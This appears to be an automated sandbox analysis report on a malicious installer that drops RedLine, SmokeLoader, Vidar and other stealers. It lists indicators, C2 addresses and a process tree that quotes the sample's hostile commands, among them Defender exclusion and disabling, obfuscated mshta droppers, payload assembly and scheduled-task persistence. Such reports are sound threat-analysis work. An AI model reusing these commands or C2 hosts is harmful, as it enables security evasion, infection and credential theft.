Resubmissions
Submitted          ID                 Score
05-10-2021 16:27   211005-tx24csaah9  10
04-10-2021 16:37   211004-t43cpsgfe7  10
04-10-2021 07:39   211004-jhgtrsfhf8  10
03-10-2021 18:09   211003-wryvvsffgk  10
02-10-2021 23:31   211002-3hwsgaehhl  10
02-10-2021 06:10   211002-gxfh5sdgg7  10
01-10-2021 13:44   211001-q16deabhek  10

Analysis
- max time kernel: 1800s
- max time network: 1804s
- platform: windows11_x64
- resource: win11
- submitted: 05-10-2021 16:27
Static task: static1
Behavioral task: behavioral1
  Sample: setup_x86_x64_install.exe
  Resource: win11
Behavioral task: behavioral2
  Sample: setup_x86_x64_install.exe
  Resource: win10v20210408
General
- Target: setup_x86_x64_install.exe
- Size: 6.4MB
- MD5: c6e46aa3d6424b03e0a4ccb193d3eade
- SHA1: c8b49055743fa7b4d6a982aea26efb627bb1f2e1
- SHA256: 5e2bf564a4f985a7482d505def1ec79c92566bf7eda4724811ee29b9c4a66156
- SHA512: 06e0c7d8012d4dbf1e6ccb7049c16d3041eb792261cc9910115c8663a45272c90cbce0ccd51875b8cd465b8f5a5c9f69164cc665b60787884ac42aec3aa7d32e
Malware Config
Extracted: redline
  Botnet: ANI
  C2: 45.142.215.47:27643
Extracted: smokeloader
  Version: 2020
  C2:
    http://fiskahlilian16.top/
    http://paishancho17.top/
    http://ydiannetter18.top/
    http://azarehanelle19.top/
    http://quericeriant20.top/

Signatures
Process spawned unexpected child process  4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process (pid 5844, pid_target 4884, rundll32.exe)
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process (pid 6312, pid_target 4884, rundll32.exe)
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process (pid 1204, pid_target 4884, rundll32.exe)
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process (pid 7116, pid_target 4884, rundll32.exe)

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload  2 IoCs
Processes:
resource | yara_rule
behavioral1/memory/5696-280-0x0000000000000000-mapping.dmp | family_redline
behavioral1/memory/5696-284-0x0000000000400000-0x0000000000422000-memory.dmp | family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload  2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10720d229511df563.exe | family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10720d229511df563.exe | family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 45 IoCs

Suspicious use of NtCreateUserProcessOtherParentProcess  2 IoCs
Processes:
description | pid | process | target process
PID 3628 created 8096 | 3628 | svchost.exe | AdvancedRun.exe
PID 3628 created 8096 | 3628 | svchost.exe | AdvancedRun.exe

Turns off Windows Defender SpyNet reporting  2 TTPs

Arkei Stealer Payload  1 IoCs
Processes:
resource | yara_rule
behavioral1/memory/5728-595-0x0000000000400000-0x0000000004A15000-memory.dmp | family_arkei

Checks for common network interception software  1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

Identifies VirtualBox via ACPI registry values (likely anti-VM)  2 TTPs

Vidar Stealer  1 IoCs
Processes:
resource | yara_rule
behavioral1/memory/5236-560-0x0000000000EC0000-0x0000000000F96000-memory.dmp | family_vidar

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libcurl.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libcurlpp.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libstdc++-6.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libstdc++-6.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libcurlpp.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libcurl.dll | aspack_v212_v242

Blocklisted process makes network request 41 IoCs

Downloads MZ/PE file

Drops file in Drivers directory  2 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | vc.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | Adam.exe

Executes dropped EXE 64 IoCs

Checks BIOS information in registry  2 TTPs  26 IoCs
BIOS information is often read in order to detect sandboxing environments.
Loads dropped DLL 64 IoCs

Reads user/profile data of web browsers  2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10d184202996a0d7f.exe | themida
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10d184202996a0d7f.exe | themida
behavioral1/memory/1120-251-0x0000000000FB0000-0x0000000000FB1000-memory.dmp | themida
C:\Users\Admin\AppData\Roaming\3012335.scr | themida

Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | DAD8.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | DAD8.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DAD8.exe = "0" | DAD8.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | DAD8.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet | DAD8.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" | DAD8.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | DAD8.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions | DAD8.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection | DAD8.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" | DAD8.exe

Accesses cryptocurrency files/wallets, possible credential harvesting  2 TTPs

Adds Run key to start application  2 TTPs  6 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | 8350716.scr
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Rolanetudo.exe\"" | vc.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xilufizhate.exe\"" | Adam.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | VC_redist.x86.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{a8968509-65be-4c09-a460-fd1584b1cdbf} = "\"C:\\ProgramData\\Package Cache\\{a8968509-65be-4c09-a460-fd1584b1cdbf}\\VC_redist.x86.exe\" /burn.runonce" | VC_redist.x86.exe
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe

Checks for any installed AV software in registry  1 TTPs  2 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab | powershell.exe
Key opened | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab | powershell.exe

Checks installed software on the system  1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 8325071.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 3768036.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 5968173.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 1957141.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 7842883.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 7494909.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | omEx3DWuyvkBKV7FT0AQ3ScE.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 5372622.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 1264582.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | OQ9NtuO6JHQnY9SFDYgUVVIz.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Fri10d184202996a0d7f.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 3012335.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 6vGqPAu8qfeRGLQgsAgR62zN.exe

Enumerates connected drives  3 TTPs  64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Legitimate hosting services abused for malware hosting/C2  1 TTPs

Looks up external IP address via web service  6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
110 | ipinfo.io
163 | ipinfo.io
1 | ip-api.com
5 | ip-api.com
5 | ipinfo.io
21 | ipinfo.io

Drops file in System32 directory  10 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | rundll32.exe
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy | rundll32.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | rundll32.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 43 IoCs

Suspicious use of SetThreadContext  13 IoCs
Processes:
description | pid | process | target process
PID 1116 set thread context of 5696 | 1116 | cmd.exe | Fri106e757f6d75.exe
PID 5676 set thread context of 4264 | 5676 | Conhost.exe | 7gTvwLANAijjTXEmQlAiwSjW.exe
PID 5432 set thread context of 1208 | 5432 | cmd.exe | Conhost.exe
PID 6380 set thread context of 908 | 6380 | J492h11PeW4FIMg2ZMZJh672.exe | J492h11PeW4FIMg2ZMZJh672.exe
PID 5284 set thread context of 4172 | 5284 | nwXhT4mxvbU7CM6XMjEXIBmy.exe | nwXhT4mxvbU7CM6XMjEXIBmy.exe
PID 6168 set thread context of 5140 | 6168 | cVMGrdBG7bRqTx2km4LCCZhc.exe | cVMGrdBG7bRqTx2km4LCCZhc.exe
PID 5964 set thread context of 8716 | 5964 | 3A21.exe | 3A21.exe
PID 1320 set thread context of 8968 | 1320 | services64.exe | explorer.exe
PID 5956 set thread context of 8300 | 5956 | Conhost.exe | Qb2MIi9oegNnBVbG5gd1YnhC.exe
PID 6220 set thread context of 5732 | 6220 | D88ljDFq9UNOTj9KFLyY3k9N.exe | D88ljDFq9UNOTj9KFLyY3k9N.exe
PID 4176 set thread context of 8060 | 4176 | 6180.exe | 6180.exe
PID 8800 set thread context of 8052 | 8800 | tmp4B76_tmp.exe | tmp4B76_tmp.exe
PID 7096 set thread context of 7044 | 7096 | DAD8.exe | DAD8.exe

Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 31 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 44 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid process
3200 schtasks.exe
5808 schtasks.exe
5424 schtasks.exe
2484 schtasks.exe
3348 schtasks.exe
6980 schtasks.exe
1672 schtasks.exe
8072 schtasks.exe
-
Delays execution with timeout.exe 1 IoCs
Processes:
pid process
7476 timeout.exe
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 64 IoCs
-
Kills process with taskkill 5 IoCs
Processes:
pid process
3884 taskkill.exe
5148 taskkill.exe
6540 taskkill.exe
5788 taskkill.exe
8688 taskkill.exe
-
Modifies data under HKEY_USERS 47 IoCs
-
Modifies registry class 14 IoCs
-
Processes:
description ioc process
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = (binary blob omitted) installer.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process
3212
-
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
pid process
908 J492h11PeW4FIMg2ZMZJh672.exe
8716 3A21.exe
-
Suspicious behavior: SetClipboardViewer 5 IoCs
Processes:
pid process
4944 1497499.scr
7136 4229854.scr
5456 3132033.scr
8296 5450761.scr
8804 8242869.scr
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid process
3628 svchost.exe
7608 ultramediaburner.tmp
7740 msedge.exe
7792 installer.exe
-
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process
3212
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1034cd265b5e0adcd.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1034cd265b5e0adcd.exeFri1034cd265b5e0adcd.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1034cd265b5e0adcd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1034cd265b5e0adcd.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10584c049c7f.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10584c049c7f.exeFri10584c049c7f.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\w2uxcc4cMRtRDh1lxPYaRWBr.exe"C:\Users\Admin\Documents\w2uxcc4cMRtRDh1lxPYaRWBr.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\cROITyfCaqlkei4UAo3FDvJv.exe"C:\Users\Admin\Documents\cROITyfCaqlkei4UAo3FDvJv.exe"6⤵
-
C:\Users\Admin\Documents\cROITyfCaqlkei4UAo3FDvJv.exeC:\Users\Admin\Documents\cROITyfCaqlkei4UAo3FDvJv.exe7⤵
-
C:\Users\Admin\Documents\7gTvwLANAijjTXEmQlAiwSjW.exe"C:\Users\Admin\Documents\7gTvwLANAijjTXEmQlAiwSjW.exe"6⤵
-
C:\Users\Admin\Documents\7gTvwLANAijjTXEmQlAiwSjW.exeC:\Users\Admin\Documents\7gTvwLANAijjTXEmQlAiwSjW.exe7⤵
-
C:\Users\Admin\Documents\8l54xatZTOGBybnf4k3ttDxI.exe"C:\Users\Admin\Documents\8l54xatZTOGBybnf4k3ttDxI.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 2647⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Documents\nwXhT4mxvbU7CM6XMjEXIBmy.exe"C:\Users\Admin\Documents\nwXhT4mxvbU7CM6XMjEXIBmy.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\nwXhT4mxvbU7CM6XMjEXIBmy.exe"C:\Users\Admin\Documents\nwXhT4mxvbU7CM6XMjEXIBmy.exe"7⤵
-
C:\Users\Admin\Documents\nwXhT4mxvbU7CM6XMjEXIBmy.exe"C:\Users\Admin\Documents\nwXhT4mxvbU7CM6XMjEXIBmy.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 19247⤵
- Program crash
-
C:\Users\Admin\Documents\CBnv8tjBVAeP34KScYqZjiqN.exe"C:\Users\Admin\Documents\CBnv8tjBVAeP34KScYqZjiqN.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 2767⤵
- Program crash
-
C:\Users\Admin\Documents\FvZoTSTSOGQSyVChh8_aLSmB.exe"C:\Users\Admin\Documents\FvZoTSTSOGQSyVChh8_aLSmB.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 2607⤵
- Program crash
-
C:\Users\Admin\Documents\kC0fqcBmzMdbc8QWWAtGpoTa.exe"C:\Users\Admin\Documents\kC0fqcBmzMdbc8QWWAtGpoTa.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 3007⤵
- Program crash
-
C:\Users\Admin\Documents\6vGqPAu8qfeRGLQgsAgR62zN.exe"C:\Users\Admin\Documents\6vGqPAu8qfeRGLQgsAgR62zN.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\CTtuY9hwW3FMqWux3oZa60MB.exe"C:\Users\Admin\Documents\CTtuY9hwW3FMqWux3oZa60MB.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"7⤵
-
C:\Users\Admin\Documents\zHzN09gFCSlzeYIl30eGUiPR.exe"C:\Users\Admin\Documents\zHzN09gFCSlzeYIl30eGUiPR.exe"8⤵
-
C:\Users\Admin\Documents\RnHVQcrmNhVuEVKsLbtxsIoS.exe"C:\Users\Admin\Documents\RnHVQcrmNhVuEVKsLbtxsIoS.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\RnHVQcrmNhVuEVKsLbtxsIoS.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\RnHVQcrmNhVuEVKsLbtxsIoS.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\RnHVQcrmNhVuEVKsLbtxsIoS.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\RnHVQcrmNhVuEVKsLbtxsIoS.exe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"14⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM15⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM17⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "RnHVQcrmNhVuEVKsLbtxsIoS.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\QqRD1KNoGmPvXGVpjKcMImn9.exe"C:\Users\Admin\Documents\QqRD1KNoGmPvXGVpjKcMImn9.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp4B76_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp4B76_tmp.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmp4B76_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp4B76_tmp.exe10⤵
-
C:\Users\Admin\Documents\pz1w402Pzju6IfXoNbdcpz6B.exe"C:\Users\Admin\Documents\pz1w402Pzju6IfXoNbdcpz6B.exe"8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 17489⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\MmYgApLfKB8gqJX8ME4xjtpT.exe"C:\Users\Admin\Documents\MmYgApLfKB8gqJX8ME4xjtpT.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 2569⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Documents\3wXJ4lAIKgiKLgvmdG797CDc.exe"C:\Users\Admin\Documents\3wXJ4lAIKgiKLgvmdG797CDc.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Documents\3wXJ4lAIKgiKLgvmdG797CDc.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"=="""" for %w iN ( ""C:\Users\Admin\Documents\3wXJ4lAIKgiKLgvmdG797CDc.exe"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Documents\3wXJ4lAIKgiKLgvmdG797CDc.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""=="" for %w iN ( "C:\Users\Admin\Documents\3wXJ4lAIKgiKLgvmdG797CDc.exe" ) do taskkill /f -Im "%~nXw"10⤵
-
C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""=="""" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))12⤵
-
